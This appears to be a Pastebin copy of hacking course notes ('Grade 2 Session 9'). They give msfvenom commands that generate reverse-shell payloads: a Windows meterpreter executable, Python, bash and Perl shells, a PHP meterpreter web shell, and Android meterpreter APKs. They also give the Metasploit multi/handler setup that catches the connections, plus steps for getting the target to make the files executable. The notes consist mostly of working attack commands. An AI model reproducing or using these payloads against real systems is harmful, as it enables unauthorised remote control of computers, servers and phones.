Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Grade 2 Session 9
- ===================
- MSFVENOM : Which createsd payloads and binds up the encoding function in that.
- Msfpayload and Msfencoder in 2015 they both get binded up in one single functionality known as MSFVENOM.
- We use Msfvenom outside the platform of MSFConsole, cause msfconsole will only provides listening on the reverse connection via exploits.
- 1. Application based Payload : Windows (.exe)
- Microsoft Operating System ---> exe ---> file.exe ---> executable
- msfvenom -p windows/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.80 -f exe > /root/Desktop/lol.exe
- > which we will make executable
- 2. Python Based Exploit for Unix/Linux System
- msfvenom -p cmd/unix/reverse_python lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/pyth.py
- Dependencies :
- Transfer pyth.py in the target machine.
- Ask the target to make it executable by typing
- chmod 777 pyth.py
- 3. Bash Based Payload for Linux/Unix
- msfvenom -p cmd/unix/reverse_bash lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/lmao.sh
- Transfer lmao.sh in the target machine.
- Ask the target to make it executable by typing
- chmod 777 lmao.sh
- 4. Perl Based Payload For Linux/Unix (Runs Perfect on MAC)
- msfvenom -p cmd/unix/reverse_perl lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/troll.pl
- Transfer troll.pl in the target machine.
- Ask the target to make it executable by typing
- chmod 777 troll.pl
- 5. Creating a PHP Shell For Servers
- msfvenom -p php/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/website.php
- 6. Exploit Android/Smart Phones using metasploit using tcp
- msfvenom -p android/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 R > /root/Desktop/mobile.apk
- 7. Exploit Android/Smart Phones using metasploit using HTTPS
- msfvenom -p android/meterpreter/reverse_https lport=1337 lhost=192.168.0.132 R > /root/Desktop/phone.apk
- FOR ALL THESE, USING METASPLOIT FRAMEWORK LISTENER TO LISTEN THE REVERSE CONNECTION :
- > Open MSF = msfconsole
- > Use Exploit = use exploit/multi/handler (A wildcard Exploit which can be used for listening to the reverse connection.)
- > msfconsole
- use exploit/multi/handler
- set payload PAYLOADNAME
- show options
- set lport PORTADDRESSFORLISTENING
- set lhost IPADDRESSFORLISTENING
- show options
- exploit
- -----------------------------------------------------------------------
- After Meterpreter,
- meterpreter> ? (Show Options)
- meterpreter> Use Commands
- -----------------------------------------------------------------------
- MOBSF (Mobile Security Framework)-
Add Comment
Please, Sign In to add comment